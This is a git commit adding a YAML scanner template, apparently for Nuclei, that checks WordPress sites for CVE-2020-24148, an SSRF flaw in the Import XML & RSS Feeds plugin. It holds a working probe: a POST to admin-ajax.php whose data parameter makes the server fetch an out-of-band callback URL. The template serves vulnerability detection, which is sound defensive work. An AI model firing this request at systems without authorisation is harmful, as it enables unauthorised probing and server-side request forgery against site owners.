Add CVE-2020-24148

2021-07-12 09:24:50 +07:00 · 2021-07-12 09:24:50 +07:00 · 4ea2c71a3d
parent 983995ba88
commit 4ea2c71a3d
1 changed files with 22 additions and 0 deletions
--- a/cves/2021/CVE-2020-24148.yaml
+++ b/cves/2021/CVE-2020-24148.yaml
@ -0,0 +1,22 @@
+id: CVE-2020-24148
+
+info:
+  name: Import XML & RSS Feeds Wordpress Plugin <= 2.0.1 SSRF
+  tags: cve,cve2020,wordpress,wp-plugin,ssrf
+  author: dwisiswant0
+  severity: critical
+  reference: https://github.com/dwisiswant0/CVE-2020-24148
+  description: |
+    Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed)
+    plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action.
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"
+    body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0"
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"